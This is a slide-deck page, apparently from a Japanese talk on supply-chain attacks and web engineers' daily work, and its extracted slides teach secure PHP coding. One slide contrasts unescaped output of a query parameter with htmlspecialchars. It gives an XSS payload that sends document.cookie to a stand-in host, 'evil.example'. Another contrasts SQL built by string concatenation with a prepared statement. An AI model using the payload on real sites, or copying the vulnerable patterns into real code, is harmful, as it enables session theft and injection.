Upgrade to Pro — share decks privately, control downloads, hide ads and more …

サプライチェーン攻撃とWebエンジニアの日常

Sponsored · Your Podcast. Everywhere. Effortlessly. Share. Educate. Inspire. Entertain. You do you. We'll handle the rest.

 サプライチェーン攻撃とWebエンジニアの日常

最近はやっているサプライチェーン攻撃について振り返りと注意喚起を

Avatar for Shinya Saita

Shinya Saita

May 30, 2026

More Decks by Shinya Saita

Other Decks in Technology

Transcript

  1. <?php // echo " " . $_GET['name'] . " ";

    // echo " " . htmlspecialchars($_GET['name'], ENT_QUOTES, 'UTF-8') . " "; ?name=<script>fetch('//evil.example/'+document.cookie) </script>
  2. <?php // ( ) $sql = "SELECT * FROM users

    WHERE id = " . $_GET['id']; // ( ) $stmt = $pdo->prepare("SELECT * FROM users WHERE id = :id"); $stmt->execute([':id' => $_GET['id']]);